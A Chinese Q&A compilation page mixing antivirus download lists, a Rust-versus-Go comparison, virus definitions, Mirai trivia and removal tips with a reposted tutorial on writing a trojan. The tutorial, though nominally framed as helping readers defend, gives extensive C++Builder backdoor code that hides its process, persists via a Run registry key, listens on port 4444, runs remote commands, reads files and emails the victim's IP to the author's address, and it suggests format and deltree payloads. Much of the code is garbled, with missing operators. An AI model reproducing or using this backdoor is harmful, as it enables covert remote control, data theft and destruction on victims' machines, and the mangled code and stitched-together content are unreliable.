本文目录一览:
- 1、什么杀毒软件最好?各排名如何?
- 2、对比Go 语言,Rust 有什么优势和劣势
- 3、什么是黑客?什么是电脑病毒?是怎么作的?
- 4、黑客公开大型ddos攻击"mirai"源代码是用什么写的
- 5、如何删掉go.exe和setup.exe
- 6、有人学过GO语言么?和C++比、优缺点在那?
什么杀毒软件最好?各排名如何?
你的50分可以省了
排名没大意义
这个网站可以自己选择个
其他资料
---卡巴斯基---
1. 卡巴斯基反病毒软件单机 V5.0.388 简体中文版
卡巴斯基中文单机版(Kaspersky Anti-Virus Personal)
2. 卡巴斯基反病毒软件单机 V5.0.372 简体中文版
卡巴斯基中文单机版(Kaspersky Anti-Virus Personal)是俄罗斯著名数据安全厂商K
download.21cn.com/list.php?id=52533
3. 卡巴斯基反病毒软件单机 V5.0.388 简体中文版
4. 卡巴斯基反病毒软件单机 V5.0.372 简体中文版
download.winzheng.com/softview/SoftView_31650.htm
5. 卡巴斯基 v5.0.142 简体中文版
6. 卡巴斯基 v5.0.142 简体中文版
7. 卡巴斯基(Kaspersky) v5.0.390 Pro 官方简体中文版+key 2007-07-14
8. 卡巴斯基反病毒单机专业版 V5.0.388 简体中文注册版
down.htcnc.net/Software/Catalog25/344.html
9. Kaspersky Anti-Virus(AVP) Personal(卡巴斯基) V5.0.388 简体中文单机版
10. Kaspersky Anti-Virus(AVP) Personal(卡巴斯基) V5.0.372 简体中文单机版 授权文件
11. Kaspersky (卡巴斯基) V5.227 简体中文版
12. Kaspersky (卡巴斯基) V5.0.156 简体中文版 授权文件
13. 卡巴斯基(AVP) v5.0.142 简体中文版
14. Kaspersky 卡巴斯基 V5.0.325 简体中文注册版 5.0.325
15. Kaspersky Anti-Virus(AVP) Personal Pro(卡巴斯基反病毒单机专业版) V5.0.388 简体中文注册版
16. 卡巴斯基V5.0.20 简体中文单机注册版
17. 卡巴斯基反病毒软件单机 V5.0.390 简体中文版
18. Kaspersky 卡巴斯基 V5.0.325 简体中文注册版
19. Kaspersky Anti-Virus(AVP) Personal(卡巴斯基) V5.0.383 简体中文单机版
20. 卡巴斯基反病毒软件单机 V5.0.388 简体中文版
down.vipgov.com/downinfo/22710.html
----Norton Antivirus 简体中文版-----
1. Norton Antivirus 2004 简体中文版
Norton AntiVirus 是一套强而有力的防毒软件,它可帮你
2. Norton Antivirus 2004 简体中文版
Norton AntiVirus 是一套强而有力的防毒软件。它可帮你侦测上万种已知和未知的病?
download.21cn.com/list.php?id=28962
3. Norton Antivirus 2003官方简体中文零售版
4. Norton AntiVirus 2004 简体中文零售光盘RIP版
5. Norton AntiVirus V8.1简体中文企业版客户端
6. Norton AntiVirus9.0简体中文标准版.rar
7. Norton Antivirus 2004 简体中文零售版
8. Norton AntiVirus V8.1简体中文企业版客户端
9. Norton AntiVirus 2004 三合一简体中文版
10. Norton Antivirus(诺顿杀毒) 2004简体中文正式免激活版
11. Norton AntiVirus 2004 三合一简体中文版
12. Norton AntiVirus V8.1简体中文企业版客户端
13. Norton AntiVirus 2005 简体中文光盘零售版
down.htcnc.net/Software/Catalog25/966.html
14. Norton Antivirus(诺顿杀毒) 2004 简体中文正式版
15. Norton Antivirus 2004 简体中文版
16. Norton Antivirus 2004 简体中文版
down.xxjp.org/Software/Catalog21/7541.html
17. Norton Antivirus(诺顿杀毒)v10.0.0.359.Final 官方简体中文企业版
18. Norton Antivirus Corporate Edition v8.0 简体中文版
19. Norton Antivirus Corporate Edition v9.0 简体中文版
20. Norton Antivirus(诺顿杀毒)v10.0.0.359.Final 官方简体中文企业版
---金山毒霸 ---
1. 金山毒霸 2006 杀毒套装
金山毒霸自全面实行互联网战略以来,截至目前为止,全
2. 金山毒霸6 全功能下载版(增强版)
金山毒霸6全功能下载版与市场上价值99元的标准增强版一样。防毒更有效自动扫描电脑系
3. 金山毒霸6 新功能体验版
金山毒霸6是金山公司继金山毒霸V之后推出的新一代反病毒产品,秉持了金山毒霸“以客户
4. 金山毒霸 6 安全组合装 完整升级包 12.30
金山毒霸可查杀超过2万种病毒家族和近百种黑客程序,除传统的病毒外,还能查杀最新的A
5. 金山毒霸6 组合安装试用版(2003.12.18)
金山毒霸6是金山公司继金山毒霸V之后推出的新一代反病毒产品,秉持了金山毒霸“以
download.21cn.com/list.php?id=23915
6. 金山毒霸6 安全组合装升级包(2005.10.8)
金山毒霸6是金山公司继金山毒霸V之后推出的新一代反病
7. 金山毒霸 11.06
金山出的很不错的杀毒软件,总之是不错的杀毒软件
antivirus.pchome.net/kav/7115.html
8. 金山毒霸 6 完整升级包 12.30
金山毒霸6是金山公司继金山毒霸V之后推出的新一代反病毒产品,秉持了金山毒霸“以客户
9. 金山毒霸6最新增强版 Build 0201
金山毒霸下载版,公安部权威检测95分一级品;一键智能升级
antivirus.pchome.net/kav/16591.html
10. 金山毒霸6 完整升级包(2005.12.30)
金山毒霸6是金山公司继金山毒霸V之后推出的新一代反病
11. 金山毒霸 6 完整升级包 2005.12.30
金山毒霸6 完整升级包
antivirus.pchome.net/kav/7108.html
12. 金山毒霸6 升级版
鉴于升级服务器压力,金山公司尚未开通毒霸6升级版升级
13. 金山毒霸 6 程序升级包 2005.12.30
金山毒霸 6 程序升级包
antivirus.pchome.net/kav/7414.html
14. 金山毒霸2006 体验版
《金山毒霸2006》除了继承《金山毒霸2005》的“主动实时升级、抢先启动防毒系统、主动
15. 金山毒霸--新欢乐时光专杀工具 Build 2002.6.24.44
VBS.KJ 是一个感染 html/htm、jsp、vbs、php、asp 的脚
16. 金山毒霸6 安全组合装升级包 (2005.10.14)
金山毒霸6是金山公司继金山毒霸V之后推出的新一代反病毒产品,秉持了金山毒霸“以
download.21cn.com/list.php?id=38829
17. 金山毒霸6 升级版
鉴于升级服务器压力,金山公司尚未开通毒霸6升级版升级到毒霸6增强版的在线升级,但
download.21cn.com/list.php?id=39203
18. 金山毒霸6 完整升级包 (2005.12.30)
金山毒霸6是金山公司继金山毒霸V之后推出的新一代反病毒产品,秉持了金山毒霸“以
download.21cn.com/list.php?id=38828
19. 金山毒霸6 全功能下载版(增强版)
金山毒霸6全功能下载版与市场上价值99元的标准增强版一样。 防毒更有效 自动扫描?
download.21cn.com/list.php?id=50424
20. 金山毒霸 2006 杀毒套装
可查杀超过2万种病毒家族和近百种黑客程序
antivirus.pchome.net/kav/7112.html
---江民杀毒软件---
1. 江民杀毒软件 KV2005AAA 标准版
KV2005是江民科技集十余年反病毒经验,根据病毒发展趋
2. 江民杀毒软件KV2005AAA 下载版
KV2005是江民科技集十余年反病毒经验,根据病毒发展趋势和电脑用户的安全需求,由江民
3. KV江民杀毒王 2004 离线增量升级包(2005.12.30)
①本离线升级包与上面的"KV江民杀毒王2004安装包"配
4. 江民杀毒KV2004离线增量升级包 (2005.12.31)
江民杀毒KV2004离线增量升级包
antivirus.pchome.net/kv/393.html
5. 江民杀毒软件KV2005 基础离线包下载 06.13
KV2005是江民科技集十余年反病毒经验,根据病毒发展趋势和电脑用户的安全需求,由江民
6. 江民杀毒软件 KV2005AAA 下载版
KV2005是江民科技集十余年反病毒经验,根据病毒发展趋
7. 江民杀毒软件KV2005AAA 标准版
KV2005是江民科技集十余年反病毒经验,根据病毒发展趋势和电脑用户的安全需求,由江民
8. KV江民杀毒王2004离线增量升级包 (2005.12.30)
①本离线升级包与上面的"KV江民杀毒王2004安装包"配合使用的; ②用?
download.21cn.com/list.php?id=34314
9. 江民杀毒软件KV2005升级版(KV2004用户升级专用) 2005
此软件专供KV2004用户升级使用。KV2005是江民科技集十余年反病毒经验,根据病毒发展趋
10. 江民杀毒王KV 2005 下载版
KV2005是江民科技集十余年反病毒经验,根据病毒发展趋势和电脑用户的安全需求,由
download.21cn.com/list.php?id=31823
11. 江民杀毒软件 KV2005AAA 下载版
KV2005是江民科技集十余年反病毒经验,根据病毒发展趋势和电脑用户的安全需求,由
download.21cn.com/list.php?id=52327
12. 江民杀毒软件KV2005升级版(KV2004用户升级专用) 2005
13. 江民杀毒软件KV2005下载版 KV2005 1208 KV2005纯DOS(U盘+NTFS通用)
14. 江民杀毒软件 KV2005AAA 标准版
15. 江民杀毒软件 KV2005AAA 下载版
16. KV江民杀毒王 2004 离线增量升级包 (2005.12.28)
17. 江民杀毒王KV 2005 V08.16 (软盘+光盘+U盘+NTFS通用)Dos版
18. 江民杀毒软件KV2005AAA 下载版
down.chinaz.com/S/15942.asp
19. 江民杀毒软件 KV2005 正式授权版
20.下面都是瑞星下载
或者
你进入这个网站,记住这个网站,然后要升级可以还从这里下载更新包,一安装OK了!
对比Go 语言,Rust 有什么优势和劣势
对于Rust的优势我的体会如下:
* Error Handling机制好太多,用Result封装函数运行结果灵活性大大提高,代码也大大简洁
* 函数式编程支持较好,有Lambda这种东西,使得它写起来甚至有Ruby的感觉
* 效率高,没有了GC和Runtime,速度是没得说的
* 支持范型
* 有宏和编译器插件这些黑客技,语言扩展性较好
* 社区活跃度更高,更强调社区的作用,有[RFC](GitHub - rust-lang/rfcs: RFCs for changes to Rust)。[中文社区](Rust China)也有了
Rust的劣势是:
* 语言特性复杂,对新手就不会那么友好
* 稳定性不够,语言的进化较激进
* 第三方库的成熟度还落后于Go,商业化的应用也还不够
什么是黑客?什么是电脑病毒?是怎么作的?
什么是计算机病毒
计算机病毒是一个程序,一段可执行码。就像生物病毒一样,计算机病毒有独特的复制能力。计算机病毒可以很快地蔓
延,又常常难以根除。它们能把自身附着在各种类型的文件上。当文件被复制或从一个用户传送到另一个用户时,它们就随
同文件一起蔓延开来。
除复制能力外,某些计算机病毒还有其它一些共同特性:一个被污染的程序能够传送病毒载体。当你看到病毒载体似乎
仅仅表现在文字和图象上时,它们可能也已毁坏了文件、再格式化了你的硬盘驱动或引发了其它类型的灾害。若是病毒并不
寄生于一个污染程序,它仍然能通过占据存贮空间给你带来麻烦,并降低你的计算机的全部性能。
可以从不同角度给出计算机病毒的定义。一种定义是通过磁盘、磁带和网络等作为媒介传播扩散,能“传染” 其他程序
的程序。另一种是能够实现自身复制且借助一定的载体存在的具有潜伏性、传染性和破坏性的程序。还有的定义是一种人为
制造的程序,它通过不同的途径潜伏或寄生在存储媒体(如磁盘、内存)或程序里。当某种条件或时机成熟时,它会自生复制
并传播,使计算机的资源受到不同程序的破坏等等。这些说法在某种意义上借用了生物学病毒的概念,计算机病毒同生物病毒
所相似之处是能够侵入计算机系统和网络,危害正常工作的“病原体”。它能够对计算机系统进行各种破坏,同时能够自我复
制, 具有传染性。
所以, 计算机病毒就是能够通过某种途径潜伏在计算机存储介质(或程序)里, 当达到某种条件时即被激活的具有对计
算机资源进行破坏作用的一组程序或指令集合。
参考:
木马是如何编写的(一)
武汉 周侃
特洛依木马这个名词大家应该不陌生,自从98年“死牛崇拜”黑客小组公布Back Orifice以来,木马犹如平地上的惊雷,使在Dos??Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒,终于认识到的网络也有它邪恶的一面,一时间人心惶惶。
我那时在《电脑报》上看到一篇文章,大意是一个菜鸟被人用BO控制了,吓得整天吃不下饭、睡不着觉、上不了网,到处求救!呵呵,要知道,木马(Trojan)的历史是很悠久的:早在ATT Unix和BSD Unix十分盛行的年代,木马是由一些玩程式(主要是C)水平很高的年轻人(主要是老美)用C或Shell语言编写的,基本是用来窃取登陆主机的口令,以取得更高的权限。那时木马的主要方法是诱骗??先修改你的.profile文件,植入木马;当你登陆时将你敲入的口令字符存入一个文件,用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的熏陶下长大的,对网络可以说很陌生。直到Win9x横空出世,尤其是WinNt的普及,大大推动了网络事业的发展的时候,BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马(甚至在Win9x的“关闭程序”对话框可以看到进程)给了当时中国人极大的震撼,它在中国的网络安全方面可以说是一个划时代的软件。
自己编写木马,听起来很Cool是不是?!木马一定是由两部分组成??服务器程序(Server)和客户端程序(Client),服务器负责打开攻击的道路,就像一个内奸特务;客户端负责攻击目标,两者需要一定的网络协议来进行通讯(一般是TCP/IP协议)。为了让大家更好的了解木马攻击技术,破除木马的神秘感,我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马,使大家能更好地防范和查杀各种已知和未知的木马。
首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi,这里我们选用C++Builder(以下简称BCB);VC虽然好,但GUI设计太复杂,为了更好地突出我的例子,集中注意力在木马的基本原理上,我们选用可视化的BCB;Delphi也不错,但缺陷是不能继承已有的资源(如“死牛崇拜”黑客小组公布的BO2000源代码,是VC编写的,网上俯拾皆是);VB嘛,谈都不谈??难道你还给受害者传一个1兆多的动态链接库??Msvbvm60.dll吗?
启动C++Builder 5.0企业版,新建一个工程,添加三个VCL控件:一个是Internet页中的Server Socket,另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序,可以对外服务(对攻击者敞开大门)。Socket最初是在Unix上出现的,后来微软将它引入了Windows中(包括Win98和WinNt);后两个控件的作用是用来使程序具有FTP(File Transfer Protocol文件传输协议)和SMTP(Simple Mail Transfer Protocol简单邮件传输协议)功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。
Form窗体是可视的,这当然是不可思议的。不光占去了大量的空间(光一个Form就有300K之大),而且使软件可见,根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form,就像Delphi用过程实现的小程序一般只有17K左右那样。
我们首先应该让我们的程序能够隐身。双击Form,首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘,其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此,只要将我们的程序在进程数据库中用RegisterServiceProcess()函数注册成服务进程(Service Process)就可以了。不过该函数的声明在Borland预先打包的头文件中没有,那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。
首先判断目标机的操作系统是Win9x还是WinNt:
{
DWORD dwVersion = GetVersion();
// 得到操作系统的版本号
if (dwVersion = 0x80000000)
// 操作系统是Win9x,不是WinNt
{
typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
file://定义RegisterServiceProcess()函数的原型
HINSTANCE hDLL;
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
hDLL = LoadLibrary("KERNEL32");
file://加载RegisterServiceProcess()函数所在的动态链接库KERNEL32.DLL
lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");
file://得到RegisterServiceProcess()函数的地址
lpRegisterServiceProcess(GetCurrentProcessId(),1);
file://执行RegisterServiceProcess()函数,隐藏本进程
FreeLibrary(hDLL);
file://卸载动态链接库
}
}
这样就终于可以隐身了(害我敲了这么多代码!)。为什么要判断操作系统呢?因为WinNt中的进程管理器可以对当前进程一览无余,因此没必要在WinNt下也使用以上代码(不过你可以使用其他的方法,这个留到后面再讲)。接着再将自己拷贝一份到%System%目录下,例如:C:\Windows\System,并修改注册表,以便启动时自动加载:
{
char TempPath[MAX_PATH];
file://定义一个变量
GetSystemDirectory(TempPath ,MAX_PATH);
是system目录缓冲区的地址,MAX_PATH是缓冲区的大小,得到目标机的System目录路径
SystemPath=AnsiString(TempPath);
file://格式化TempPath字符串,使之成为能供编译器使用的样式
CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE);
file://将自己拷贝到%System%目录下,并改名为Tapi32.exe,伪装起来
Registry=new TRegistry;
file://定义一个TRegistry对象,准备修改注册表,这一步必不可少
Registry-RootKey=HKEY_LOCAL_MACHINE;
file://设置主键为HKEY_LOCAL_MACHINE
Registry-OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",TRUE);
file://打开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run,如果不存在,就创建之
try
{
file://如果以下语句发生异常,跳至catch,以避免程序崩溃
if(Registry-ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")
Registry-WriteString("crossbow",SystemPath+"\\Tapi32.exe");
file://查找是否有“crossbow”字样的键值,并且是否为拷贝的目录%System%+Tapi32.exe
file://如果不是,就写入以上键值和内容
}
catch(...)
{
file://如果有错误,什么也不做
}
}
好,FormCreate过程完成了,这样每次启动都可以自动加载Tapi32.exe,并且在“关闭程序”对话框中看不见本进程了,木马的雏形初现。
接着选中ServerSocket控件,在左边的Object Inspector中将Active改为true,这样程序一启动就打开特定端口,处于服务器工作状态。再将Port填入4444,这是木马的端口号,当然你也可以用别的。但是你要注意不要用1024以下的低端端口,因为这样不但可能会与基本网络协议使用的端口相冲突,而且很容易被发觉,因此尽量使用1024以上的高端端口(不过也有这样一种技术,它故意使用特定端口,因为如果引起冲突,Windows也不会报错 ^_^)。你可以看一看TNMFTP控件使用的端口,是21号端口,这是FTP协议的专用控制端口(FTP Control Port);同理TNMSMTP的25号端口也是SMTP协议的专用端口。
再选中ServerSocket控件,点击Events页,双击OnClientRead事件,敲入以下代码:
{
FILE *fp=NULL;
char * content;
int times_of_try;
char TempFile[MAX_PATH];
file://定义了一堆待会儿要用到的变量
sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369.BAT")).c_str());
file://在%System%下建立一个文本文件Win369.bat,作为临时文件使用
AnsiString temp=Socket-ReceiveText();
file://接收客户端(攻击者,也就是你自己)传来的数据
}
好,大门敞开了!接着就是修改目标机的各种配置了!^_^ 首先我们来修改Autoexec.bat和Config.sys吧:
{
if(temp.SubString(0,9)=="edit conf")
file://如果接受到的字符串的前9个字符是“edit conf”
{
int number=temp.Length();
file://得到字符串的长度
int file_name=atoi((temp.SubString(11,1)).c_str());
file://将第11个字符转换成integer型,存入file_name变量
file://为什么要取第11个字符,因为第10个字符是空格字符
content=(temp.SubString(12,number-11)+'\n').c_str();
file://余下的字符串将被作为写入的内容写入目标文件
FILE *fp=NULL;
char filename[20];
chmod("c:\\autoexec.bat",S_IREADS_IWRITE);
chmod("c:\\config.sys",S_IREADS_IWRITE);
file://将两个目标文件的属性改为可读可写
if(file_name==1)
sprintf(filename,"%s","c:\\autoexec.bat");
file://如果第11个字符是1,就把Autoexec.bat格式化
else if(file_name==2)
sprintf(filename,"%s","c:\\config.sys");
file://如果第11个字符是1,就把Config.sys格式化
times_of_try=0;
file://定义计数器
while(fp==NULL)
{
file://如果指针是空
fp=fopen(filename,"a+");
file://如果文件不存在,创建之;如果存在,准备在其后添加
file://如果出错,文件指针为空,这样就会重复
times_of_try=times_of_try+1;
file://计数器加1
if(times_of_try100)
{
file://如果已经试了100次了,仍未成功
Socket-SendText("Fail By Open File");
file://就发回“Fail By Open File”的错误信息
goto END;
file://跳至END处
}
}
fwrite(content,sizeof(char),strlen(content),fp);
file://写入添加的语句,例如deltree/y C:或者format/q/autotest C:,够毒吧?!
fclose(fp);
file://写完后关闭目标文件
Socket-SendText("Sucess");
file://然后发回“Success”的成功信息
}
}
上回我们讲到如何修改目标机上的启动配置文件,这回我们就来查看目标机上的目录树和文件吧,这在客户端上使用“dir”命令,跟着敲?:
{
else if(temp.SubString(0,3)=="dir")
{
file://如果前3个字符是“dir”
int Read_Num;
char * CR_LF="\n";
int attrib;
char *filename;
DIR *dir;
struct dirent *ent;
int number=temp.Length();
file://得到字符串的长度
AnsiString Dir_Name=temp.SubString(5,number-3);
file://从字符串第六个字符开始,将后面的字符存入Dir_Name变量,这是目录名
if(Dir_Name=="")
{
file://如果目录名为空
Socket-SendText("Fail By Open DIR's Name");
file://返回“Fail By Open DIR's Name”信息
goto END;
file://跳到END
}
char * dirname;
dirname=Dir_Name.c_str();
if ((dir = opendir(dirname)) == NULL)
{
file://如果打开目录出错
Socket-SendText("Fail by your DIR's name!");
file://返回“Fail By Your DIR's Name”信息
goto END;
file://跳到END
}
times_of_try=0;
while(fp==NULL)
{
file://如果指针是NULL
fp=fopen(TempFile,"w+");
file://就创建system\Win369.bat准备读和写;如果此文件已存在,则会被覆盖
times_of_try=times_of_try+1;
file://计数器加1
if(times_of_try100)
{
file://如果已经试了100次了,仍未成功(真有耐心!)
Socket-SendText("Fail By Open File");
file://就发回“Fail By Open File”的错误信息
goto END;
file://并跳到END处
}
}
while ((ent = readdir(dir)) != NULL)
{
file://如果访问目标目录成功
if(*(AnsiString(dirname)).AnsiLastChar()!='\\')
file://如果最后一个字符不是“\”,证明不是根目录
filename=(AnsiString(dirname)+"\\"+ent-d_name).c_str();
file://加上“\”字符后将指针指向目录流
else
filename=(AnsiString(dirname)+ent-d_name).c_str();
file://如果是根目录,则不用加“\”
attrib=_rtl_chmod(filename, 0);
file://得到目标文件的访问属性
if (attrib FA_RDONLY)
file://“”字符是比较前后两个变量,如果相同返回1,否则返回0
fwrite(" R",sizeof(char),3,fp);
file://将目标文件属性设为只读
else
fwrite(" ",sizeof(char),3,fp);
file://失败则写入空格
if (attrib FA_HIDDEN)
fwrite("H",sizeof(char),1,fp);
file://将目标文件属性设为隐藏
else
fwrite(" ",sizeof(char),1,fp);
file://失败则写入空格
if (attrib FA_SYSTEM)
fwrite("S",sizeof(char),1,fp);
file://将目标文件属性设为系统
else
fwrite(" ",sizeof(char),1,fp);
file://失败则写入空格
if (attrib FA_ARCH)
fwrite("A",sizeof(char),1,fp);
file://将目标文件属性设为普通
else
fwrite(" ",sizeof(char),1,fp);
file://失败则写入空格
if (attrib FA_DIREC)
fwrite(" DIR ",sizeof(char),9,fp);
file://将目标文件属性设为目录
else
fwrite(" ",sizeof(char),9,fp);
file://失败则写入空格
fwrite(ent-d_name,sizeof(char),strlen(ent-d_name),fp);
file://将目录名写入目标文件
fwrite(CR_LF,1,1,fp);
file://写入换行
}
fclose(fp);
file://关闭文件
closedir(dir);
file://关闭目录
FILE *fp1=NULL;
times_of_try=0;
while(fp1==NULL)
{
fp1=fopen(TempFile,"r");
file://打开Win369.bat准备读
times_of_try=times_of_try+1;
file://计数器加1
if(times_of_try100)
{
file://如果已经试了100次了,仍未成功
Socket-SendText("Fail By Open File");
file://就发回“Fail By Open File”的错误信息
goto END;
file://并跳到END处
}
}
AnsiString Return_Text="";
char temp_content[300];
for(int i=0;i300;i++) temp_content[i]='\0';
file://定义的一个空数组
Read_Num=fread(temp_content,1,300,fp1);
file://从目标文件中读入前300个字符
while(Read_Num==300)
{
Return_Text=Return_Text+temp_content;
变量加上刚才的300个字符
for(int i=0;i300;i++) temp_content[i]='\0';
Read_Num=fread(temp_content,1,300,fp1);
file://重复
};
Return_Text=Return_Text+temp_content;
变量加上刚才的300个字符
fclose(fp1);
file://关闭目标文件
Socket-SendText(Return_Text);
file://返回Return_Text变量的内容
}
}
够长吧?!察看目录树这么费劲啊?!你后面可以用BCB中的各种列表框对Client.exe好好美化美化。接下来就是查看指定文件的内容了,Client将使用“type”命令,(手指累不累啊?):
{
else if(temp.SubString(0,4)=="type")
{
file://如果前4个字符是“type”
int Read_Num;
int number=temp.Length();
AnsiString File_Name=temp.SubString(6,number-4);
file://将目标文件流存入File_Name变量中
times_of_try=0;
while(fp==NULL)
{
fp=fopen(File_Name.c_str(),"r");
file://打开目标文件准备读
times_of_try=times_of_try+1;
file://计数器加1
if(times_of_try100)
{
file://如果已试了100次了
Socket-SendText("Fail By Open File");
file://返回“Fail By Open File”的错误信息
goto END;
file://跳到END
}
}
AnsiString Return_Text="";
char temp_content[300];
for(int i=0;i300;i++) temp_content[i]='\0';
file://定义一个空数组
Read_Num=fread(temp_content,1,300,fp);
file://从目标文件中读入前300个字符
while(Read_Num==300)
{
Return_Text=Return_Text+temp_content;
的内容加上刚才的字符
for(int i=0;i300;i++) temp_content[i]='\0';
Read_Num=fread(temp_content,1,300,fp);
file://重复
};
Return_Text=Return_Text+temp_content;
的内容加上刚才的字符
fclose(fp);
file://关闭目标文件
Socket-SendText(Return_Text);
file://返回Return_Text的内容,即你查看文件的内容
}
}
咳咳!累死了!还是来点轻松的吧??操纵目标机的光驱(注意:mciSendString()函数的声明在mmsystem.h头文件中):
{
else if(temp=="open")
{
file://如果收到的temp的内容是“open”
mciSendString("set cdaudio door open", NULL, 0, NULL);
file://就弹出光驱的托盘
}
else if(temp=="close")
{
file://如果收到的temp的内容是“close”
mciSendString("Set cdaudio door closed wait", NULL, 0, NULL);
file://就收入光驱的托盘。当然你也可以搞个死循环,让他的光驱好好活动活动!^_^
}
}
接着就是交换目标机的鼠标左右键,代码如下:
{
else if(temp=="swap")
{
SwapMouseButton(1);
file://交换鼠标左右键,简单吧?
}
}
然后就是使目标机重新启动。但这里要区分WinNt和Win9x??NT非常注重系统每个进程的权利,一个普通的进程是不应具备有调用系统的权利的,因此我们要赋予本程序足够的权限:
{
else if(temp=="reboot")
{
file://如果收到的temp的内容是“temp”
DWORD dwVersion = GetVersion();
file://得到操作系统的版本号
if (dwVersion 0x80000000)
{
file://操作系统是WinNt,不是Win9x
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
file://定义变量
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES TOKEN_QUERY, hToken);
这个函数的作用是打开一个进程的访问令牌
函数的作用是得到本进程的句柄
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,tkp.Privileges[0].Luid);
的作用是修改进程的权限
tkp.PrivilegeCount = 1;
file://赋给本进程特权
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);
的作用是通知Windows NT修改本进程的权利
ExitWindowsEx(EWX_REBOOT EWX_FORCE, 0);
file://强行退出WinNt并重启
}
else ExitWindowsEx(EWX_FORCE+EWX_REBOOT,0);
file://强行退出Win9x并重启
}
}
如果以上都不是,就让它在Dos窗口中执行传来的命令:
{
else
{
file://如果都不是
char * CR_TF="\n";
times_of_try=0;
while(fp==NULL)
{
fp=fopen(TempFile,"w+");
file://创建Win369.bat,如果已存在就覆盖
times_of_try=times_of_try+1;
file://计数器加1
if(times_of_try100)
{
Socket-SendText("Fail By Open File");
file://返回“Fail By Open File”的信息
goto END;
file://跳到END
}
}
fwrite(temp.c_str(),sizeof(char),strlen(temp.c_str()),fp);
file://写入欲执行的命令
fwrite(CR_TF,sizeof(char),strlen(CR_TF),fp);
file://写入换行符
fclose(fp);
file://关闭Win369.bat
system(TempFile);
file://执行Win369.bat
Socket-SendText("Success");
file://返回“Success”信息
}
}
你可以直接执行什么Ping和Tracert之类的命令来进一步刺探目标机的网络状况(判断是否是一个企业的局域网),然后可以进一步攻击,比如Deltree和Format命令。^_^
到此,服务器程序的功能已全部完成,但还差容错部分未完成,这样才能避免程序因意外而崩溃。朋友,别走开!(未完待续)
木马是如何编写的(三)
武汉 周侃
上次已编写完服务器端的各种功能,但还差容错部分还未完成,下面我们Go on! 其代码如下(照敲不误 ^_^):
{
END:;
Socket-Close();
file://关闭服务
ServerSocket1-Active =true;
file://再次打开服务
if (NMSMTP1-Connected) NMSMTP1-Disconnect();
file://如果SMTP服务器已连接则断开
NMSMTP1-Host = "smtp.163.net";
file://选一个好用的SMTP服务器,如163、263、sina和btamail
NMSMTP1-UserID = "";
file://你SMTP的ID
try
{
NMSMTP1-Connect();
file://再次连接
}
catch(...)
{
goto NextTime;
file://跳到NextTime
}
NMSMTP1-PostMessage-FromAddress ="I don't know!";
file://受害者的Email地址
NMSMTP1-PostMessage-FromName = "Casualty";
file://受害者的名字
NMSMTP1-PostMessage-ToAddress-Text = "crossbow@8848.net";
file://将信发到我的邮箱,这一步很关键
NMSMTP1-PostMessage-Body-Text = AnsiString("Server Running on:") + NMSMTP1-LocalIP ;
file://信的内容提示你“服务器正在运行”,并且告诉你受害者的目前的IP地址,以便连接
NMSMTP1-PostMessage-Subject = "Server Runn
黑客公开大型ddos攻击"mirai"源代码是用什么写的
C和Go语言啊
bot端采用纯C写的
CNC采用GO语言
至于Mirai DDoS的工具源码,除了scanListen,其余都是C哦。
如何删掉go.exe和setup.exe
原因:
1.病毒正在运行。由于Windows保护正在运行的程序,所以杀毒软件
是无法杀死正在运行的病毒。即使是真的杀死了病毒,电脑正常关机时内存中
活动的病毒还会再复制一个病毒到硬盘上;
(建议在安全模式下杀毒)
2.病毒隐藏在系统还原的文件夹“_restore”中;
3.删除注册表中RUN多余的启动项。
解决办法:
1.在Windows中杀毒前首先得中止病毒进程。对于WindowsXp/2000,可以使
用任务管理器(Ctrl+Alt+Del三键齐按)来查看当前所有的进程,而对于Windows98/Me,
则可以使用“黑客入门工具箱”或ATM来查看进程。确定哪个是来历不明的就停止
掉,该过程俗称“杀进程”。不要怕出错,因为不会对电脑造成任何损坏,最多就是死机。
注意,杀进程的操作有时得进行两次才成功。有的病毒有两个进程,互相保护,杀掉一
个则会被另一个发现并恢复。此时应先把该病毒在注册表中的启动项去掉,然后用突然
断电的方式重启电脑(不让病毒对系统有任何保存的操作),再进入安全模式杀毒。
2.在Windows中使用专杀工具杀毒。得使用最新的杀毒版本(至少要更新病毒库)。
3.禁用系统还原。在WindowsMe中禁用方法是∶鼠标右键点击“我的电脑”-属性-性能
-文件系统-疑难解答-禁止系统还原。在WindowsXP中禁用方法是∶控制面板-系统-
系统属性-系统还原-在所有驱动器上关闭系统还原。然后用软盘或U盘启动电脑,
在dos下删除_RESTORE文件夹。
4.在Dos下杀毒不存在杀不死的问题。一般的杀毒软件都可以制作软盘版
(含至少3张软盘),用第一张盘启动(CMOS中必须设定软盘启动在前)后按提示陆续放入
其它盘就可以直接杀毒了。瑞星的软盘版需要用鼠标确定杀毒的驱动器,而金山毒霸的
软盘版则默认全机查杀。实际上用金山毒霸在DOS下杀毒还可以更简单,用普通软盘启
动盘或U盘启动盘启动电脑后,先换到C盘,然后进入金山毒霸的目录(命令:cd
kav或
cd
